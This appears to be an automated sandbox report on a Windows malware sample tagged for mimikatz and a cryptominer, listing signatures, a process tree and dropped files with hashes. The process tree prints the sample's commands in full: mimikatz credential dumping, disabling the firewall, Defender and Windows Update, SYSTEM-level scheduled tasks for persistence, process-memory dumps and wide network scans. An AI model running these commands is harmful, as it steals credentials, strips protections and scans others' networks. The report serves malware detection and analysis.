Analysis

  • max time kernel
    151s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    07-05-2024 05:27

General

  • Target

    2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe

  • Size

    7.8MB

  • MD5

    59cd884d3b145f770bf5c689fd90025f

  • SHA1

    1334c015b3dfedc9dac1a4d5020f9314476f5f39

  • SHA256

    6ea8970a7fc929a9d258c028258a3aaadc121f4588f053cbc5a380ca91b67124

  • SHA512

    f98384f5fc9bedaf59b066c5bc8768257587b7201818cc0a16ebb5f2f884a96ae0eda13894d06e7041528b2180b96b22a43328e80d4c24f468dec3d8f47d46b3

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (25224) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
  • UPX dump on OEP (original entry point) 32 IoCs
  • XMRig Miner payload 11 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 6 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Sets file execution options in registry 2 TTPs 40 IoCs
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 22 IoCs
  • UPX packed file 29 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates a Windows Service
  • Drops file in System32 directory 12 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:108
      • C:\Windows\TEMP\qvzqhemke\feezub.exe
        "C:\Windows\TEMP\qvzqhemke\feezub.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1128
    • C:\Users\Admin\AppData\Local\Temp\2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2256
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\pbhldrte\lbktbat.exe
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1876
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • Runs ping.exe
          PID:1072
        • C:\Windows\pbhldrte\lbktbat.exe
          C:\Windows\pbhldrte\lbktbat.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2572
    • C:\Windows\pbhldrte\lbktbat.exe
      C:\Windows\pbhldrte\lbktbat.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2568
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2624
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2600
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:2560
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:2696
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:1644
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:2420
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                      PID:2552
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static del all
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:2392
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add policy name=Bastards description=FuckingBastards
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:1948
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filteraction name=BastardsList action=block
                    2⤵
                      PID:560
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c C:\Windows\uifypdhej\yffpneitq\wpcap.exe /S
                      2⤵
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:2728
                      • C:\Windows\uifypdhej\yffpneitq\wpcap.exe
                        C:\Windows\uifypdhej\yffpneitq\wpcap.exe /S
                        3⤵
                        • Drops file in Drivers directory
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops file in System32 directory
                        • Drops file in Program Files directory
                        • Suspicious use of WriteProcessMemory
                        PID:1128
                        • C:\Windows\SysWOW64\net.exe
                          net stop "Boundary Meter"
                          4⤵
                            PID:1472
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop "Boundary Meter"
                              5⤵
                                PID:2316
                            • C:\Windows\SysWOW64\net.exe
                              net stop "TrueSight Meter"
                              4⤵
                                PID:928
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop "TrueSight Meter"
                                  5⤵
                                    PID:2328
                                • C:\Windows\SysWOW64\net.exe
                                  net stop npf
                                  4⤵
                                    PID:1528
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop npf
                                      5⤵
                                        PID:1624
                                    • C:\Windows\SysWOW64\net.exe
                                      net start npf
                                      4⤵
                                        PID:1260
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 start npf
                                          5⤵
                                            PID:2040
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c net start npf
                                      2⤵
                                        PID:2476
                                        • C:\Windows\SysWOW64\net.exe
                                          net start npf
                                          3⤵
                                            PID:1756
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 start npf
                                              4⤵
                                                PID:1988
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c net start npf
                                            2⤵
                                              PID:2980
                                              • C:\Windows\SysWOW64\net.exe
                                                net start npf
                                                3⤵
                                                  PID:1080
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 start npf
                                                    4⤵
                                                      PID:2240
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c C:\Windows\uifypdhej\yffpneitq\ebbdzzetb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\uifypdhej\yffpneitq\Scant.txt
                                                  2⤵
                                                  • Loads dropped DLL
                                                  PID:1068
                                                  • C:\Windows\uifypdhej\yffpneitq\ebbdzzetb.exe
                                                    C:\Windows\uifypdhej\yffpneitq\ebbdzzetb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\uifypdhej\yffpneitq\Scant.txt
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:2960
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c C:\Windows\uifypdhej\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\uifypdhej\Corporate\log.txt
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • Drops file in Windows directory
                                                  PID:1052
                                                  • C:\Windows\uifypdhej\Corporate\vfshost.exe
                                                    C:\Windows\uifypdhej\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1512
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "kcubjublm" /ru system /tr "cmd /c C:\Windows\ime\lbktbat.exe"
                                                  2⤵
                                                    PID:272
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                      3⤵
                                                        PID:600
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /create /sc minute /mo 1 /tn "kcubjublm" /ru system /tr "cmd /c C:\Windows\ime\lbktbat.exe"
                                                        3⤵
                                                        • Creates scheduled task(s)
                                                        PID:1588
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ubkteilin" /ru system /tr "cmd /c echo Y|cacls C:\Windows\pbhldrte\lbktbat.exe /p everyone:F"
                                                      2⤵
                                                        PID:1652
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                          3⤵
                                                            PID:1692
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /sc minute /mo 1 /tn "ubkteilin" /ru system /tr "cmd /c echo Y|cacls C:\Windows\pbhldrte\lbktbat.exe /p everyone:F"
                                                            3⤵
                                                            • Creates scheduled task(s)
                                                            PID:1704
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "eyeiudmyb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\qvzqhemke\feezub.exe /p everyone:F"
                                                          2⤵
                                                            PID:2788
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                              3⤵
                                                                PID:2208
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /sc minute /mo 1 /tn "eyeiudmyb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\qvzqhemke\feezub.exe /p everyone:F"
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:2684
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                              2⤵
                                                                PID:1980
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                                2⤵
                                                                • Modifies data under HKEY_USERS
                                                                PID:924
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                2⤵
                                                                • Modifies data under HKEY_USERS
                                                                PID:1876
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static set policy name=Bastards assign=y
                                                                2⤵
                                                                  PID:2816
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                  2⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:1724
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                  2⤵
                                                                    PID:2384
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                    2⤵
                                                                      PID:2396
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static set policy name=Bastards assign=y
                                                                      2⤵
                                                                        PID:2856
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                        2⤵
                                                                          PID:2364
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                          2⤵
                                                                          • Modifies data under HKEY_USERS
                                                                          PID:2708
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                          2⤵
                                                                          • Modifies data under HKEY_USERS
                                                                          PID:1296
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh ipsec static set policy name=Bastards assign=y
                                                                          2⤵
                                                                            PID:2204
                                                                          • C:\Windows\TEMP\uifypdhej\cfqmyyevt.exe
                                                                            C:\Windows\TEMP\uifypdhej\cfqmyyevt.exe -accepteula -mp 108 C:\Windows\TEMP\uifypdhej\108.dmp
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Modifies data under HKEY_USERS
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2356
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /c net stop SharedAccess
                                                                            2⤵
                                                                              PID:1624
                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                net stop SharedAccess
                                                                                3⤵
                                                                                  PID:1464
                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                    C:\Windows\system32\net1 stop SharedAccess
                                                                                    4⤵
                                                                                      PID:612
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c netsh firewall set opmode mode=disable
                                                                                  2⤵
                                                                                    PID:1388
                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                      netsh firewall set opmode mode=disable
                                                                                      3⤵
                                                                                      • Modifies Windows Firewall
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:2096
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd /c netsh Advfirewall set allprofiles state off
                                                                                    2⤵
                                                                                      PID:2128
                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                        netsh Advfirewall set allprofiles state off
                                                                                        3⤵
                                                                                        • Modifies Windows Firewall
                                                                                        • Modifies data under HKEY_USERS
                                                                                        PID:2068
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c net stop MpsSvc
                                                                                      2⤵
                                                                                        PID:1780
                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                          net stop MpsSvc
                                                                                          3⤵
                                                                                            PID:1272
                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                              C:\Windows\system32\net1 stop MpsSvc
                                                                                              4⤵
                                                                                                PID:3024
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c net stop WinDefend
                                                                                            2⤵
                                                                                              PID:2892
                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                net stop WinDefend
                                                                                                3⤵
                                                                                                  PID:1152
                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                    C:\Windows\system32\net1 stop WinDefend
                                                                                                    4⤵
                                                                                                      PID:776
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /c net stop wuauserv
                                                                                                  2⤵
                                                                                                    PID:1104
                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                      net stop wuauserv
                                                                                                      3⤵
                                                                                                        PID:2104
                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                          C:\Windows\system32\net1 stop wuauserv
                                                                                                          4⤵
                                                                                                            PID:2628
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c sc config MpsSvc start= disabled
                                                                                                        2⤵
                                                                                                          PID:2076
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            sc config MpsSvc start= disabled
                                                                                                            3⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:1536
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd /c sc config SharedAccess start= disabled
                                                                                                          2⤵
                                                                                                            PID:2220
                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                              sc config SharedAccess start= disabled
                                                                                                              3⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:2348
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /c sc config WinDefend start= disabled
                                                                                                            2⤵
                                                                                                              PID:2980
                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                sc config WinDefend start= disabled
                                                                                                                3⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:968
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd /c sc config wuauserv start= disabled
                                                                                                              2⤵
                                                                                                                PID:692
                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                  sc config wuauserv start= disabled
                                                                                                                  3⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:888
                                                                                                              • C:\Windows\TEMP\xohudmc.exe
                                                                                                                C:\Windows\TEMP\xohudmc.exe
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Drops file in System32 directory
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:768
                                                                                                              • C:\Windows\TEMP\uifypdhej\cfqmyyevt.exe
                                                                                                                C:\Windows\TEMP\uifypdhej\cfqmyyevt.exe -accepteula -mp 1224 C:\Windows\TEMP\uifypdhej\1224.dmp
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1560
                                                                                                              • C:\Windows\TEMP\uifypdhej\cfqmyyevt.exe
                                                                                                                C:\Windows\TEMP\uifypdhej\cfqmyyevt.exe -accepteula -mp 1316 C:\Windows\TEMP\uifypdhej\1316.dmp
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2344
                                                                                                              • C:\Windows\TEMP\uifypdhej\cfqmyyevt.exe
                                                                                                                C:\Windows\TEMP\uifypdhej\cfqmyyevt.exe -accepteula -mp 1992 C:\Windows\TEMP\uifypdhej\1992.dmp
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2416
                                                                                                              • C:\Windows\TEMP\uifypdhej\cfqmyyevt.exe
                                                                                                                C:\Windows\TEMP\uifypdhej\cfqmyyevt.exe -accepteula -mp 2596 C:\Windows\TEMP\uifypdhej\2596.dmp
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2428
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd.exe /c C:\Windows\uifypdhej\yffpneitq\scan.bat
                                                                                                                2⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:2096
                                                                                                                • C:\Windows\uifypdhej\yffpneitq\fqbserpdq.exe
                                                                                                                  fqbserpdq.exe TCP 191.101.0.1 191.101.255.255 445 512 /save
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops file in Windows directory
                                                                                                                  PID:1956
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                2⤵
                                                                                                                  PID:2520
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                    3⤵
                                                                                                                      PID:2408
                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                                      3⤵
                                                                                                                        PID:1672
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                        3⤵
                                                                                                                          PID:820
                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                                          3⤵
                                                                                                                            PID:3132
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                            3⤵
                                                                                                                              PID:2608
                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                              3⤵
                                                                                                                                PID:916
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                                                                                                                            1⤵
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:2436
                                                                                                                          • C:\Windows\SysWOW64\dqljao.exe
                                                                                                                            C:\Windows\SysWOW64\dqljao.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:2784
                                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                                            taskeng.exe {814328BC-B0F1-4CCE-A018-EAC5E9C43B78} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                            1⤵
                                                                                                                              PID:2392
                                                                                                                              • C:\Windows\system32\cmd.EXE
                                                                                                                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\pbhldrte\lbktbat.exe /p everyone:F
                                                                                                                                2⤵
                                                                                                                                  PID:1144
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                    3⤵
                                                                                                                                      PID:2916
                                                                                                                                    • C:\Windows\system32\cacls.exe
                                                                                                                                      cacls C:\Windows\pbhldrte\lbktbat.exe /p everyone:F
                                                                                                                                      3⤵
                                                                                                                                        PID:2324
                                                                                                                                    • C:\Windows\system32\cmd.EXE
                                                                                                                                      C:\Windows\system32\cmd.EXE /c C:\Windows\ime\lbktbat.exe
                                                                                                                                      2⤵
                                                                                                                                        PID:1948
                                                                                                                                        • C:\Windows\ime\lbktbat.exe
                                                                                                                                          C:\Windows\ime\lbktbat.exe
                                                                                                                                          3⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:1124
                                                                                                                                      • C:\Windows\system32\cmd.EXE
                                                                                                                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\qvzqhemke\feezub.exe /p everyone:F
                                                                                                                                        2⤵
                                                                                                                                          PID:1404
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                            3⤵
                                                                                                                                              PID:2804
                                                                                                                                            • C:\Windows\system32\cacls.exe
                                                                                                                                              cacls C:\Windows\TEMP\qvzqhemke\feezub.exe /p everyone:F
                                                                                                                                              3⤵
                                                                                                                                                PID:2708
                                                                                                                                            • C:\Windows\system32\cmd.EXE
                                                                                                                                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\pbhldrte\lbktbat.exe /p everyone:F
                                                                                                                                              2⤵
                                                                                                                                                PID:4040
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1064
                                                                                                                                                  • C:\Windows\system32\cacls.exe
                                                                                                                                                    cacls C:\Windows\pbhldrte\lbktbat.exe /p everyone:F
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2540
                                                                                                                                                  • C:\Windows\system32\cmd.EXE
                                                                                                                                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\qvzqhemke\feezub.exe /p everyone:F
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2880
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:564
                                                                                                                                                        • C:\Windows\system32\cacls.exe
                                                                                                                                                          cacls C:\Windows\TEMP\qvzqhemke\feezub.exe /p everyone:F
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2672
                                                                                                                                                        • C:\Windows\system32\cmd.EXE
                                                                                                                                                          C:\Windows\system32\cmd.EXE /c C:\Windows\ime\lbktbat.exe
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1752
                                                                                                                                                            • C:\Windows\ime\lbktbat.exe
                                                                                                                                                              C:\Windows\ime\lbktbat.exe
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:2732

                                                                                                                                                        Network

                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                        Replay Monitor

                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                        Downloads

                                                                                                                                                        • C:\Windows\SysWOW64\Packet.dll

                                                                                                                                                          Filesize

                                                                                                                                                          95KB

                                                                                                                                                          MD5

                                                                                                                                                          86316be34481c1ed5b792169312673fd

                                                                                                                                                          SHA1

                                                                                                                                                          6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

                                                                                                                                                          SHA256

                                                                                                                                                          49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

                                                                                                                                                          SHA512

                                                                                                                                                          3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

                                                                                                                                                        • C:\Windows\SysWOW64\wpcap.dll

                                                                                                                                                          Filesize

                                                                                                                                                          275KB

                                                                                                                                                          MD5

                                                                                                                                                          4633b298d57014627831ccac89a2c50b

                                                                                                                                                          SHA1

                                                                                                                                                          e5f449766722c5c25fa02b065d22a854b6a32a5b

                                                                                                                                                          SHA256

                                                                                                                                                          b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                                                                                                                                          SHA512

                                                                                                                                                          29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                                                                                                                                        • C:\Windows\TEMP\qvzqhemke\config.json

                                                                                                                                                          Filesize

                                                                                                                                                          693B

                                                                                                                                                          MD5

                                                                                                                                                          f2d396833af4aea7b9afde89593ca56e

                                                                                                                                                          SHA1

                                                                                                                                                          08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                                                                                                                                          SHA256

                                                                                                                                                          d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                                                                                                                                          SHA512

                                                                                                                                                          2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                                                                                                                                        • C:\Windows\TEMP\uifypdhej\108.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          4.5MB

                                                                                                                                                          MD5

                                                                                                                                                          5f35e9020478be6470255afa8902328d

                                                                                                                                                          SHA1

                                                                                                                                                          96eeec987ef741a0ca81d6b3f695759d7759e102

                                                                                                                                                          SHA256

